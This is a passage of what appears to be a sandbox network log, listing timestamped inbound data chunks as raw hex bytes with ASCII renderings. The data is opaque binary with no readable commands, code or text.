2023-11-18 09:02:40 UTC	7484	IN	Data Raw: ab f0 57 db a6 f5 b2 ea a9 de 5c b7 7b a6 af bd 03 2f 67 0d 16 5e b6 64 c8 1b a9 ef 4f 65 be 73 1d 5c c3 f5 b9 17 47 05 9e e2 59 eb 71 90 a8 20 2f 83 04 37 72 9d ff 4d aa 0a b2 8f c8 1a cb 8a f4 53 86 ce 30 eb dc a4 3a c7 94 97 f5 52 dd ee ae 74 2f 07 3a 77 10 3a 9b 57 76 70 cd d8 1b fa 6c 4c af 73 01 6c 46 af e5 3a 0f 04 a9 df c8 55 bd 08 24 f4 8c 18 5f 54 b2 20 37 80 c4 05 09 81 b8 37 71 b2 06 24 bc d6 ac 7c 74 a3 b1 1f 80 e2 ab 49 95 f7 ac e5 79 2c f5 dd ed c1 0e 94 ef 27 94 9f 36 2e 60 8a f0 97 d1 53 ef a6 cc 11 1e 7a 9c 2b ff 01 8e f2 09 c5 f6 82 4c 10 36 87 40 ca 36 71 ef b4 ee 83 6c f3 2c 27 a7 82 04 9e e3 e5 94 82 84 04 19 09 b2 4e 94 5c 09 a2 3d 61 d9 61 bb 49 79 a7 06 ff 70 7a d3 7a 47 b5 47 1f 63 b9 3a 56 de 29 73 e0 1d 9f f0 4e b5 79 99 4d 9b Data Ascii: W\{/g^dOes\GYq /7rMS0:Rt/:w:WvplLslF:U$_T 77q$\|tIy,'6.`Sz+L6@6ql,'N\=aaIypzzGGc:V)sNyM
2023-11-18 09:02:40 UTC	7500	IN	Data Raw: 38 f1 a5 a5 13 a4 7c 30 5f 27 14 92 1c cd 31 5c 09 89 10 fd 7d 37 e4 d2 61 be 4e 3e c4 d7 45 7c 57 00 51 6f 8a ef 0a 20 66 2e b5 28 9f 1b cf 47 4d 75 5c e6 9e 90 d3 43 b8 a6 a3 21 fd 92 b8 84 ee f3 b5 bf 72 c0 57 8e 82 bc 9a cd fd 3d 15 52 af 98 23 9f 0d f1 b3 e2 d9 aa 08 92 2c e2 5c 0e b1 78 c7 fd fd 15 e4 61 1b 96 66 51 c8 ba 5c ae 69 9f 28 ed 5f 9e 65 19 07 c9 33 e0 7a f9 40 f2 af 71 b6 2c 81 ec 1e 27 d6 d8 10 c3 fb 3c d2 1e 8b d2 fe 0a 04 c7 b9 04 f2 cd 2b 2e cf 53 c8 dd d6 2c 0d 16 60 65 75 8f f7 2a 2d 21 66 a2 17 7c 01 c9 79 cb e3 aa 0d 24 ad 2f cf 9e ae 10 9f 03 dc 16 73 17 e8 cf 7a 1b 20 2b 4c b9 37 1d 82 34 de cb ad f3 33 c4 ba 8c 4b f8 10 92 24 be f3 34 5e 88 35 e4 08 f1 66 04 d2 68 01 af 7b 87 2e e4 bb ff f5 bd 8d bb 7b b0 d9 7c 5e c9 8c c5 31 Data Ascii: 8\|0_'1\}7aN>E\|WQo f.(GMu\C!rW=R#,\xafQ\i(_e3z@q,'<+.S,`eu*-!f\|y$/sz +L743K$4^5fh{.{\|^1
2023-11-18 09:02:40 UTC	7516	IN	Data Raw: 8f cc 84 a6 b5 ec aa 75 a5 1f 59 f8 f6 b8 78 0e e6 4b 02 d0 7e a5 46 a4 2a 08 e2 ca 57 00 e8 f5 12 11 9c d3 d7 d2 26 0f 7d 43 49 ed 1b 6c 91 9c 3c 7a 3d 48 c8 01 1a 86 c1 aa cb 08 36 a6 14 56 e9 61 c4 76 69 b1 35 80 94 2a d4 aa c6 1c 31 b7 71 36 e9 8e b2 21 da d3 5b 94 bf 86 4f 97 57 f3 49 8e 79 b6 0c 08 6d ae 28 66 89 06 4c be c8 dc 55 91 63 9e 2d 03 22 30 37 bf 48 35 e6 17 64 ee fa fc 2a c7 3c 5b 06 84 36 37 bd 4a bd b3 18 9b 9b 66 99 67 cb 80 d0 e6 e6 45 9a 3d 16 63 73 f3 69 8e 79 b6 0c 08 ea 4b ce 19 c3 39 b4 cb d3 18 77 99 93 e0 f3 8b 2c ee dc 8d 71 17 af 24 83 8e 0f 45 09 08 92 1d 02 5c 00 41 b1 85 00 57 a0 fc da c0 f6 ee 7a f8 a6 ce 71 4d bf 8b c4 4b 0d 37 12 34 66 84 56 46 5d 03 db f9 60 55 af 31 68 21 37 fa 59 c8 05 4b 23 41 dc 0b f3 21 da 40 5b Data Ascii: uYxK~FW&}CIl<z=H6Vavi51q6![OWIym(fLUc-"07H5d*<[67JfgE=csiyK9w,q$E\AWzqMK74fVF]`U1h!7YK#A!@[
2023-11-18 09:02:40 UTC	7532	IN	Data Raw: 74 67 a3 20 72 0f 21 9c 72 6f 20 f9 eb cf 5d 86 b1 85 80 27 53 e2 d4 db 6c 21 76 3b 95 92 16 a8 af d9 d6 c0 f0 62 16 bc a0 01 26 6b 49 f3 07 4b ce 2f 52 aa 71 a3 f5 09 7c a1 e9 d3 c7 3f c0 b8 0c e9 76 34 1b 89 63 f1 03 c9 51 23 0c 4a 16 1d 68 d5 fa 01 3e 56 3d 0c d5 7d b8 43 88 ed 7a 80 a8 58 34 03 b9 8e 41 b1 d0 14 75 c1 31 90 82 ae 60 1d 01 c3 6f b8 b6 b6 ee db 77 c4 88 5a 34 c9 3e d5 b0 4e 26 34 68 28 32 d8 be a4 8f 95 45 8a 2a 5b 76 be 1e c0 54 f3 b4 d5 0d 5c 58 73 36 39 9e 42 88 80 bf e9 6a fb f8 8d b2 c9 04 1c b2 52 bf b8 45 84 4f 0a 87 f0 53 ad 32 4c a8 33 fe 5c 5c a9 3e 63 8b 8c 60 2a 70 0c 53 ad 18 87 38 e9 f3 f9 17 f1 62 42 d8 bf 97 1c e5 5f 4b 1e f0 6f 25 d7 7e b2 e9 10 e0 90 5c a2 fd 61 46 90 34 1e d6 93 80 0b 98 16 eb a4 49 00 41 bc 6a 63 53 Data Ascii: tg r!ro ]'Sl!v;b&kIK/Rq\|?v4cQ#Jh>V=}CzX4Au1`owZ4>N&4h(2E[vT\Xs69BjREOS2L3\\>c`pS8bB_Ko%~\aF4IAjcS
2023-11-18 09:02:40 UTC	7548	IN	Data Raw: b7 d2 92 7e 8e fa 86 79 21 93 c3 69 6b 9e 4f 99 f4 2b 87 33 09 ee c9 02 d2 a8 b3 00 92 c6 d6 9f 95 b0 65 ce 00 87 79 f9 93 f8 ea 9b c3 b7 f8 f6 c0 0b 43 6b 8a e4 41 a0 a1 9b c1 aa ec 82 12 6b f8 6b 80 25 e3 dc 96 8e 15 80 4c a4 34 38 a5 91 84 42 97 38 85 2e bc 79 29 e6 e7 ed 61 33 c1 f0 40 54 86 59 29 9a be 12 26 b9 00 4b 3f c5 b2 11 50 5b fb 58 80 66 d0 7c 88 37 64 40 ed c7 e0 b0 9f 06 d3 a0 04 95 bb d7 bd 0b bd 50 7c ae b4 65 c6 86 f4 6c b0 b9 db 1e 5f ea ee e5 36 26 64 94 b0 e8 c8 a7 66 07 2f aa 21 99 cb af 37 78 b9 58 ec 81 f0 05 74 57 2c a4 b0 a8 ba 0a 6c 23 5a 61 04 22 af 22 a3 dc 79 d3 3b fc 52 5e ad a8 7a 0d 3b aa 60 73 99 43 85 7d e4 5b ad f6 9f fd 0c d5 6a 5f ff b8 7e d8 45 fc 91 8b b6 6e a6 93 79 e2 86 c2 1a 7f 95 b4 4e bb c0 07 f8 43 a3 57 1a Data Ascii: ~y!ikO+3eyCkAkk%L48B8.y)a3@TY)&K?P[Xf\|7d@P\|el_6&df/!7xXtW,l#Za""y;R^z;`sC}[j_~EnyNCW
2023-11-18 09:02:40 UTC	7564	IN	Data Raw: e0 56 c0 34 aa 9e 0e 8b f9 33 41 6c b0 e4 04 f3 3d 28 6f 08 94 9f f5 e3 99 5e f5 ec 81 d3 63 fd 20 55 e0 07 fc 1d 5c b0 1a 49 16 82 f2 35 46 52 4e d6 a5 38 bb 32 2d eb 57 4b 65 5a d6 39 9f db 13 3b 9c 1a df ed a1 71 d7 90 6c 3c fc 73 b6 6f 2c ce 08 45 e2 ea 34 c0 60 13 21 ad 59 6a 59 62 c8 95 f2 c5 4b c9 8b aa 71 8a 6a d5 13 f3 58 72 ad 78 c0 0b b6 bf 60 39 b0 b1 c0 d0 a7 91 aa f2 7d dd 6c 5e b5 92 aa aa 11 9c b2 bc 2a e5 3f 19 26 ce 8b 22 c8 84 d8 91 51 64 ad 21 71 de c0 7f 67 86 22 1b 2f 62 cb 70 cb 30 d3 88 5c 2c 40 fb f2 68 eb 8f 27 37 04 53 20 84 3e b8 54 c6 60 0b 42 59 06 2f 63 30 66 40 59 26 2f 63 b0 66 86 82 5e 01 2e cb e3 00 0b cd 5f dc b2 5e 50 a9 3e f1 9c 4c 99 98 8c 1e 89 3f 7f 27 f6 1c 94 25 77 ed b2 a7 1d ad 02 38 61 1f bc a4 90 9d b6 03 81 Data Ascii: V43Al=(o^c U\I5FRN82-WKeZ9;ql<so,E4`!YjYbKqjXrx`9}l^*?&"Qd!qg"/bp0\,@h'7S >T`BY/c0f@Y&/cf^._^P>L?'%w8a
2023-11-18 09:02:40 UTC	7580	IN	Data Raw: fd a0 47 9c bb 07 c0 a4 4c 59 b0 5e fb 82 fd f2 21 0d fa 4d 04 6f b4 93 1e 20 b2 a1 f7 d5 d0 56 6c 48 59 82 04 31 c6 2f 37 a2 a7 01 e4 b3 01 90 91 03 f6 bc 13 d9 4a 94 35 79 01 f1 98 76 e6 68 86 db 23 07 71 7c 06 ec 71 5b f4 f3 80 1f 93 81 e5 d5 24 1e 7f 1c 81 6f 74 e4 92 29 17 c5 5c 63 ef 45 09 d7 42 dd 34 7d 1c 83 c5 0f 6a 5a 92 c0 ae 94 c6 27 2d 7b aa ef 3f 68 8a 63 d9 03 2f cf d7 2e e8 8d b5 86 74 7b 24 af 30 00 6b 0d 6d 98 97 60 c3 bc f2 89 61 07 75 8f 1a 90 ce c3 41 49 24 8a 98 1e 88 95 8e 97 13 8b 99 c3 fb 50 5a 1b 1d d3 81 d9 a4 0a fd 98 32 f3 85 39 9a c6 c6 8e 33 02 ae b2 ad e8 4e 31 1a a3 3c d2 d1 77 25 68 f4 ef 67 d3 01 97 7b ad 25 97 25 7f 7d 7a af 3c d1 db 88 6e 31 15 98 82 11 48 d1 b8 d7 9f 2b ad d1 ca b8 14 fc 9d 05 69 31 bb 0d 91 f1 5e a0 Data Ascii: GLY^!Mo VlHY1/7J5yvh#q\|q[$ot)\cEB4}jZ'-{?hc/.t{$0km`auAI$PZ293N1<w%hg{%%}z<n1H+i1^
2023-11-18 09:02:40 UTC	7596	IN	Data Raw: 23 85 06 a0 51 bb 0e c7 f1 2a 1a 95 5f 61 61 eb 88 9e 57 52 c6 1d fb 1a dc 06 78 a9 09 4a 78 13 bc fb a5 f8 be ba cc 24 de d9 76 67 bb c2 fb 1a 64 65 0d f2 9e 9d 96 77 1c aa 53 15 de d7 0c 91 f7 e0 f4 74 7c af 4f c5 f7 28 c9 77 ac 40 32 0d 34 79 a6 8d a9 32 b5 7f 21 32 a9 9d fc f0 8f 1d e0 68 42 69 95 5b 0f c1 3d 35 df a1 03 ee 77 b4 4b a3 6b 50 a1 51 b2 51 98 4a b8 39 02 03 e2 2d a1 60 eb 7e fe 4d be 0f ad e8 88 61 4b 03 4e cf 7b 34 8e 1c 70 19 f9 22 cf c0 92 13 f4 34 b0 e8 5a 31 46 63 95 8a b1 c6 7d c8 81 89 1c c0 25 4f 18 11 bd d9 3c 22 86 be 58 c4 2b af d1 05 fa 28 88 60 a2 31 84 7f 08 5e 82 ba 2e bc ec ee 14 65 63 5a ba b9 76 da db c3 35 72 1d e8 c3 06 ba eb 02 16 fb b1 22 66 16 22 ae 0f 0f f9 6a b7 b1 2e 80 b0 ea ce f1 c6 81 0f 8f 1b 6d a8 e9 47 8a Data Ascii: #Q*_aaWRxJx$vgdewSt\|O(w@24y2!2hBi[=5wKkPQQJ9-`~MaKN{4p"4Z1Fc}%O<"X+(`1^.ecZv5r"f"j.mG
2023-11-18 09:02:40 UTC	7612	IN	Data Raw: d6 37 7e 4f 4a 8e b8 3c 1d 7d be 13 c9 d6 ff 1b 48 f6 f8 d7 52 8c 0b 2e 07 f9 21 68 7a 3f f7 6d 6e 88 11 dd 5a 7c 78 fb f7 50 a1 9b 61 6e fa 52 bf 85 84 e4 fb cf 75 e0 82 e8 3e dd 93 ef 79 e1 69 e0 1a d7 39 50 07 1f 82 aa b9 77 00 3f ba 8c 53 44 99 aa f8 ec 02 32 df bc 2b 18 de cd e0 03 2a 48 13 ae 45 6a f0 a7 fc 46 64 c8 24 13 b7 3a 7d 5c 22 15 9d f4 3b 09 0a f1 52 2d f2 88 ec 2b a8 89 06 e8 cf 5c 68 66 b4 52 5f d0 46 73 05 67 4f 99 8e 82 8c e1 f2 f7 7f 0d 6a 36 a4 89 be 36 d1 6e 62 03 16 a8 98 04 94 60 93 5a bc 8b 43 75 93 8e b9 7e 31 00 21 79 ef 34 7d 62 00 e1 01 6f 51 08 d5 27 99 c9 b9 4b c7 35 c7 80 5d bf 46 8b ee 09 3d 88 31 b9 6b a0 1f fc 05 c7 e9 84 c9 3c ef 4a fa de c2 73 17 dd 5b 71 e0 02 cb 0e 52 16 59 88 df 67 3b f1 cf 3e c1 a1 0e 8a 1e 5f 4f Data Ascii: 7~OJ<}HR.!hz?mnZ\|xPanRu>yi9Pw?SD2+*HEjFd$:}\";R-+\hfR_FsgOj66nb`ZCu~1!y4}boQ'K5]F=1k<Js[qRYg;>_O
2023-11-18 09:02:40 UTC	7628	IN	Data Raw: c7 76 36 7a f6 48 33 e3 c4 27 6a a5 b2 58 71 dd 1e 5c 80 9d 89 9e c1 33 c5 4f 73 9f 32 a0 d4 b5 ec f8 60 40 d5 ea 1f 3b 48 a3 f1 66 53 6e 8b d3 57 3e 55 8d f8 61 de 22 8f 30 94 f3 f9 ce 46 df 22 20 44 b1 84 27 80 53 eb 31 0b df e3 23 be 04 f5 4d ea f5 d1 50 3a 3b 8c f9 48 57 84 b2 50 f7 a7 f0 1c 8b de 77 ab 20 ae eb 8c 46 73 8e 1e d8 11 11 76 74 b5 8a bd 9f 6c af 87 37 44 d9 0d 20 af f8 62 de 69 ec 8e 72 82 4a b7 ab 2b ae 04 51 b9 25 e8 68 c4 d5 4e 03 1a df 35 28 c7 7d d7 8c b4 47 3f 70 95 6f 3c 0a 65 52 43 7d fa 7b b1 e4 71 72 a3 41 49 a0 ca 7d 7f c1 f5 8d 1c 83 54 ef 4b 8d f1 c5 3c 41 02 5f 4e 0c 2e 34 c8 d7 86 fa e7 25 71 99 ef 9c ff 17 4c bb c0 d0 f8 4f 1c 3f d2 98 c8 4b e2 5e ee 37 2c 4e 3e a1 86 87 af a3 f7 f6 a1 eb ef 89 df a3 94 e2 1d 8d d2 88 54 Data Ascii: v6zH3'jXq\3Os2`@;HfSnW>Ua"0F" D'S1#MP:;HWPw Fsvtl7D birJ+Q%hN5(}G?po<eRC}{qrAI}TK<A_N.4%qLO?K^7,N>T
2023-11-18 09:02:40 UTC	7644	IN	Data Raw: 05 5d 7c 37 9f d9 59 05 2b 60 e5 cc c1 06 b1 42 a2 64 8c 69 57 ae da 4d 93 97 57 82 1a 45 a1 b5 0c 84 96 3c dc 34 66 61 51 2c f1 61 1d 9b 90 96 36 c2 18 3f 61 f2 b4 04 a3 65 d0 90 41 34 4b ff 27 ee 7f e2 fe 27 ee 7f e2 fe 27 ee ff 77 71 61 ca ea 10 3d 7b f1 6a 7e a7 2c 86 1d 7d d5 f0 71 93 1a 7e f9 7a 35 5c 37 44 0d 6f 1e aa 86 bd c3 d5 b0 cf a2 86 eb 6f 56 c3 4b 26 a9 e1 17 34 e1 86 c9 6a f8 c6 02 35 5c a2 09 4b 9a f0 80 22 35 9c a5 09 5f 35 4f 0d f7 2e 56 c3 5b 35 e1 67 e7 ab e1 3d 9a b0 c1 a6 c9 bf 4c 0d ff 72 af 1a 7e c0 ae 86 ff a1 09 7f af 09 77 73 aa e1 49 15 6a b8 f1 3e 35 3c 68 a9 a6 cf ff aa 86 f5 4f a9 e1 b5 ff 50 c3 6f 3c a7 86 9f 78 49 d3 3f 2f ab e1 87 34 e1 c2 57 d4 f0 69 4d f8 c5 7f 6a ea f0 aa 1a 3e a4 09 df ba 4e 0d bf a5 09 7f a9 09 9f Data Ascii: ]\|7Y+`BdiWMWE<4faQ,a6?aeA4K'''wqa={j~,}q~z5\7DooVK&4j5\K"5_5O.V[5g=Lr~wsIj>5<hOPo<xI?/4WiMj>N
2023-11-18 09:02:40 UTC	7660	IN	Data Raw: af 1b e0 3a c9 5d 5f 50 10 ed 1d 40 ec 62 ee ea e2 82 e8 28 5c 2d e1 ae 2e 2b 88 76 6f 44 ec 52 ee ea 4a 60 c2 d5 32 ee 6a 4b 41 b4 07 ae 8e e0 ae 6e 28 88 c2 14 ca 1e c9 5d 6d 85 70 c3 88 5d ce 5d 6d 2f 88 0e c0 d5 51 dc d5 1d 38 fd 7a 48 ff 68 ee 7a 47 41 94 af b8 14 67 d8 09 59 00 fa 0a ee 6a 17 a6 27 00 ed e2 ae 77 43 73 8d f5 a5 7b f1 2b 22 fd 03 a3 5c 53 76 e7 17 ae 86 aa 78 02 a9 97 b4 b4 d5 b5 b7 c7 90 ee 04 6e d1 53 b7 2c 19 45 ba 33 2a 70 3f 54 2f c1 8e a7 3b b3 12 77 5b 75 03 77 75 d6 64 dc 8b 54 2c bb 12 d7 2c 52 c7 3a 16 b7 c3 14 a2 bb b0 98 6b f4 0f 89 57 0f ac 1d 4e a5 52 fc 24 9c 7f 48 75 7f 01 c6 56 69 b3 d8 06 1e 0b 10 2c 13 42 30 37 11 b3 1e 0f 12 57 15 e0 6e a8 f9 07 a1 61 e5 0d 6e 26 cf ef 98 72 55 d6 44 e6 f2 fc c3 05 d3 f0 98 30 cd Data Ascii: :]_P@b(\-.+voDRJ`2jKAn(]mp]]m/Q8zHhzGAgYj'wCs{+"\SvxnS,E3*p?T/;w[uwudT,,R:kWNR$HuVi,B07Wnan&rUD0
2023-11-18 09:02:40 UTC	7676	IN	Data Raw: f3 5c c9 4e e3 3c 57 aa d3 38 cf 95 2a 19 e7 b9 f2 1c c6 79 4d 98 96 71 9e 8a e7 62 9c e7 4a 85 c6 79 ae 24 a7 71 9e 2b 55 32 ce 73 e5 29 8d f3 5c d9 6a e3 3c 15 dd 8f 71 5e d3 38 17 e3 bc a6 71 2a e3 bc a6 41 2a e3 bc a6 41 a2 71 5e 73 ba 60 9c d7 94 ee 34 ce 6b 1a e2 34 ce 6b 1a e2 cb 38 6f ed b5 88 c6 79 fe e3 45 e3 bc a6 71 6b 32 ce 3b f5 da 44 e3 bc b5 d7 23 1a e7 ad 3d 5e 34 ce 53 c5 bb 1b e7 79 b1 25 e3 3c 2f aa bb 71 9e 57 94 8b 71 9e 32 44 36 ce 73 25 39 8c f3 54 4c 17 e3 3c 9b ea 6e 9c 67 73 5c 8d f3 6c 8a 8b 71 9e 4d 50 1b e7 d9 b8 87 71 9e 4d 6a 6a 9c 67 53 5d 8d f3 6c 8a 87 71 9e 93 e4 34 ce b3 39 ae c6 79 36 a5 a9 71 9e 4d 55 1a e7 d9 70 53 e3 3c 25 55 36 ce b3 49 cd 8d f3 18 d7 db 38 4f 41 71 31 ce b3 98 ee c6 79 16 c5 d5 38 cf 62 b8 1a e7 Data Ascii: \N<W8yMqbJy$q+U2s)\j<q^8qA*Aq^s`4k4k8oyEqk2;D#=^4Sy%</qWq2D6s%9TL<ngs\lqMPqMjjgS]lq49y6qMUpS<%U6I8OAq1y8b
2023-11-18 09:02:40 UTC	7692	IN	Data Raw: 9d 70 5e df 82 7a ec d2 9d 22 87 2a 18 12 a9 11 24 7d 4b c7 fd 9d 50 f0 2c 81 5c d9 2a a8 88 2d f8 64 72 65 ab c8 e9 6a b0 ba bd 3d c5 7d 84 b9 0e 1e c4 d5 74 bf 7a 50 f7 9b 05 f4 37 5d ee c5 02 1e e6 89 82 df cc ad 13 56 76 79 41 26 f8 cd ac 1d 07 8f 0b 4b 01 c1 6f a6 19 b1 c7 7d a5 80 e0 37 d3 8e f2 ef 76 c1 08 86 ba 04 8c 4b 7d 33 9d a8 31 33 0e c0 3c 7b dd 20 34 ef 77 15 bd 99 29 3c 41 29 2c f5 cd 4c e3 8d 4b 41 a9 6f 66 06 6a 10 bb f2 a4 be 99 5e 54 cc 0b 74 41 ea 9b 99 8b ca 77 a4 44 08 34 bd 99 1f 04 a3 ae d4 37 33 3f 12 e6 52 df cc c2 28 c0 a4 be 99 45 1c 28 fa 42 ec ec b7 9b e0 48 b7 84 ab db 43 b0 70 6d f6 bb e3 e9 3a 8a a9 6e 5f 8c ab 6e 3f e6 84 c6 b9 5d 72 4e ad f8 c3 98 13 5d ce 39 42 75 fb dc 3c 36 83 8a d1 ea f6 b9 3b f9 54 8c 56 b7 cf 7d Data Ascii: p^z"$}KP,\-drej=}tzP7]VvyA&Ko}7vK}313<{ 4w)<A),LKAofj^TtAwD473?R(E(BHCpm:n_n?]rN]9Bu<6;TV}
2023-11-18 09:02:40 UTC	7708	IN	Data Raw: 23 4e 8b 0e 0e 19 a0 0d 4f 12 87 0e 5e 69 80 12 76 ac 83 e6 a4 51 2c c4 b5 ba 36 31 ae 2b 1e 90 76 ce 32 e2 bd 16 83 a0 33 40 67 a7 a4 1d 84 77 31 9c 96 57 1a 3d 59 a3 db 46 7c 4a 96 9f 90 9a 2f 74 e2 2c 3c 87 7c 32 15 51 35 0a 75 ef 4f 85 54 11 63 77 29 bd 21 2d ae 52 e8 c5 98 1a f1 53 5c 3a 90 84 5c 89 86 52 36 ab 54 22 16 0a 26 49 26 01 72 6d 0d 14 19 97 15 90 48 7a 43 21 b0 9b 12 e1 e8 cc 1c 34 09 69 35 4c 11 0b c3 c1 44 d8 4b 71 cd 78 86 66 53 20 90 c2 da 7c e1 98 e6 8d f8 b5 c9 b8 97 e2 ad 51 94 90 f5 25 c6 c7 a0 65 7d 89 44 94 85 ef 05 47 95 98 37 94 12 c4 60 a3 49 7b 7d be 54 38 45 d1 fc b4 68 2a 39 15 65 81 20 e3 58 84 53 30 40 3c 1a 8a 4e a5 54 2d 95 60 21 34 a3 33 2a b4 9a b4 1a 0b d6 d0 6d 26 4d f5 87 54 2f 82 2e a1 c8 54 62 5a 37 13 b4 9b 30 Data Ascii: #NO^ivQ,61+v23@gw1W=YF\|J/t,<\|2Q5uOTcw)!-RS\:\R6T"&I&rmHzC!4i5LDKqxfS \|Q%e}DG7`I{}T8Eh9e XS0@<NT-`!43m&MT/.TbZ70
2023-11-18 09:02:40 UTC	7724	IN	Data Raw: cd c6 08 ae 27 42 ff ae 72 29 94 3b 9f 6a 71 86 d5 4e a5 50 5a 4e 7b f3 1a 00 97 1b 03 dd c3 c7 5b 1a f1 9c 40 6b 9b 7c 7e 89 58 da 98 84 98 ab 0b 71 8f 10 e2 f4 61 8f 7f a8 10 22 33 46 0a 31 ce 9a 9a 19 63 12 62 9c b5 28 54 88 71 d6 9e 21 42 5c 62 12 22 fd 67 85 b0 a9 34 fd 16 18 a2 34 ca 63 4a c6 bb 70 2e 64 b9 d3 e3 ff ae 98 64 59 d3 91 b1 c2 46 8a 48 25 ef f0 44 c6 7a c2 15 09 81 ba 70 21 d0 4e 10 1e 84 2b 94 52 75 e1 42 aa f2 24 64 0e e7 46 8b 97 f1 38 62 ec 9e cc d8 16 90 3a 52 b3 72 0f 17 4d a7 b4 ec 58 99 4b 16 21 ba 2d d6 93 5c b4 ae d2 f2 d4 ca 8e 0b 88 ab 1b 4f 91 84 dd 2b dd a4 b0 40 70 13 61 4f 1a ec 68 38 77 63 13 cc 90 cb 19 2f e7 51 5e ce d8 a6 74 c6 7a a4 4b 3a e3 dd b9 83 e6 df 4f da 33 36 1e ce 5d af 53 53 a8 67 9c cc 61 ec 3a b8 dc 25 Data Ascii: 'Br);jqNPZN{[@k\|~Xqa"3F1cb(Tq!B\b"g44cJp.ddYFH%Dzp!N+RuB$dF8b:RrMXK!-\O+@paOh8wc/Q^tzK:O36]SSga:%
2023-11-18 09:02:40 UTC	7740	IN	Data Raw: 54 30 c2 34 4c f5 2c 62 f2 c7 c3 f0 9a 74 3d 18 8a e5 f3 e4 37 32 45 f7 7e ea ec 75 1b ed ad 3d 6e e1 06 9f 0c 43 a5 26 e0 6e c2 b3 ce a7 c3 90 84 0f c4 1c f5 b3 61 a8 e6 42 7f 3e 5c ba 6a 9b 1e 4a a8 fa 2f 86 61 93 98 4c ff 32 3d dd 83 71 45 bb 3b b0 08 63 f6 74 1e f9 b7 11 84 4b e7 99 ff f3 6d d2 8b 56 e6 df bf 4d 62 d1 40 5f 8d 20 10 9e e6 00 d0 4d fc f4 48 e8 9a 3f 4a ff fa db 94 43 38 f9 99 6f 53 0a 11 e4 1f 23 08 e2 6e 69 c1 fe c2 9d 34 4a 0a d2 98 bc 33 1e 07 dd d9 09 60 32 2b fe 0e b1 98 ea 4c fa 36 e1 97 a8 18 e2 f3 06 63 19 41 38 7d 31 0d d5 e8 81 cf a7 fd b3 9b df 8c ce 5a 0a eb ff 25 36 53 69 32 be 4b 3c a6 52 65 7e 97 f0 a6 f4 b3 d2 87 8f 06 e5 f1 20 7c 40 43 ff 64 1b 9e cd fb 33 63 d8 65 ff a6 88 fd e2 f1 cd 93 60 0e 79 f8 50 5e d5 dd 1c d0 Data Ascii: T04L,bt=72E~u=nC&naB>\jJ/aL2=qE;ctKmVMb@_ MH?JC8oS#ni4J3`2+L6cA8}1Z%6Si2K<Re~ \|@Cd3ce`yP^
2023-11-18 09:02:40 UTC	7756	IN	Data Raw: a4 f5 24 f2 3f 09 dc 8f 46 e2 df 8f 94 90 d6 6b 4a 48 eb b4 25 31 2b d6 d4 a6 0c d2 4d e0 5f 53 d5 0e bc 16 ee 6b 69 2f b3 62 4d ab 28 00 e8 54 64 56 ac e9 39 e8 0d c9 b8 cc 8a 35 23 01 c5 ac 8c c4 ac 58 33 2b 69 0c b1 07 a8 76 0b 50 d4 24 27 33 2b d6 ec 56 a8 34 17 60 56 ac 39 55 9f 12 6f 02 99 15 ab cb 8d fb 98 15 6b ae 1b 2f 32 2b d6 3c 0c 54 5b e6 b4 a5 f3 17 4e 23 b1 bf 6c 81 e6 96 30 2b db fa 40 7a 2b 9f bb cf d8 17 37 37 e3 c9 ec 11 e9 95 81 2e d1 65 5f 81 b9 9c 0f f4 b2 67 62 38 09 ab 1f 7d 21 89 35 1f 65 82 8d b1 bb 5b af 15 21 dc f5 ec 05 c5 90 60 63 ec 85 0d 83 d4 8d 15 f7 0b 7b 51 03 ec 16 39 25 1b 63 2f 76 fb ec 67 63 ec 25 c5 84 8f 8d b1 7b 2e fc 06 f5 25 bc 6c 8c bd b4 f1 0e 53 7a a3 a2 f4 a5 67 bf 98 5e 63 05 b1 19 99 70 d3 33 34 b1 af 7c Data Ascii: $?FkJH%1+M_Ski/bM(TdV95#X3+ivP$'3+V4`V9Uok/2+<T[N#l0+@z+77.e_gb8}!5e[!`c{Q9%c/vgc%{.%lSzg^cp34\|
2023-11-18 09:02:40 UTC	7772	IN	Data Raw: 33 84 b5 9b 33 4e 2e 9c 2b e4 7f 21 fa 7b 9b c0 82 44 5b b7 4d 2e 74 fe d8 c2 b9 07 63 b2 e1 cf dd 64 18 23 f4 ee 86 39 36 58 ed 18 c6 57 df 6e 1a 5f 89 7e 8d d0 12 e3 2d 72 e1 e0 1d a6 51 8d 7e 75 6e 38 44 8b f7 7d 24 aa b7 39 d6 5c 88 2e d0 bd 14 05 ee 89 84 d1 be 8b a4 0a 9f 5c 38 67 18 63 1f 8a 82 4f 1c 32 8c 43 37 51 a1 ef 02 f9 23 6f e5 9a 44 1f ff 7c 24 5b b9 75 d1 ef dd 7f 4a 9c c8 35 1d 5f 65 85 f2 61 87 9b e4 29 fe 23 2a 56 88 9f 62 e2 c2 e9 8b 94 89 c4 9d 67 48 07 98 4e fc bc e4 2e db 62 67 3b ba cd c8 49 82 85 bd c7 30 5d 87 fc f3 44 f4 58 b7 46 bf c6 76 45 ae cf 44 81 ef 27 15 36 e7 49 4d cc 75 c6 d8 d1 48 f9 8b 48 69 d0 4a e6 fb 4a b3 c6 e4 99 28 f8 8f 87 62 a6 db 2b 84 38 4a 5b 51 59 df 4a 5c 8b 6e ca 93 9c 3a 7e 3c 46 32 1e bf e3 f4 c5 e3 Data Ascii: 33N.+!{D[M.tcd#96XWn_~-rQ~un8D}$9\.\8gcO2C7Q#oD\|$[uJ5_ea)#*VbgHN.bg;I0]DXFvED'6IMuHHiJJ(b+8J[QYJ\n:~<F2
2023-11-18 09:02:40 UTC	7788	IN	Data Raw: 38 d8 0d 47 96 ea d4 24 8f de 6d 5d dd ce 4e ca 5b eb a4 c5 f7 32 ec 48 0f ea a2 27 59 4f 50 4d 93 91 22 52 52 0c 1f 99 b1 63 7a 9c 3a 2d a1 4b d5 38 e2 6d a1 c6 3e 02 87 db 2d a6 37 35 27 b1 8c 9c a8 ad 33 74 69 03 fd 42 ef d4 21 9b 3f 55 5b 75 51 52 97 d6 eb a2 13 6c c3 5a 8a 49 0e 3f 03 37 88 14 5e 8d 30 a9 c3 b7 20 4c f4 12 0c d5 74 53 b4 35 ae ab a4 56 e8 43 d4 f3 76 da c6 6a 5c 3d b5 23 c1 ca 8f 2a 80 d5 22 d1 8d 46 a3 35 bc e2 84 b0 7b 6a a3 ae cc dc 00 43 90 4a 5d 6c f1 ec 14 03 5c d7 c1 bc 26 98 81 8c 35 02 02 57 b1 0a 21 b6 15 fe 59 e0 d7 b1 82 78 51 71 5c ec 05 02 c7 a3 30 49 2b d3 c5 47 74 85 7a 7a 17 4e bf ad 65 3f a9 ea d3 76 82 b7 9a 6c 28 1a 69 0c 62 62 b8 c6 3b d6 3a 78 13 73 92 a4 a1 16 4f 8b d1 62 ca 86 75 e6 69 72 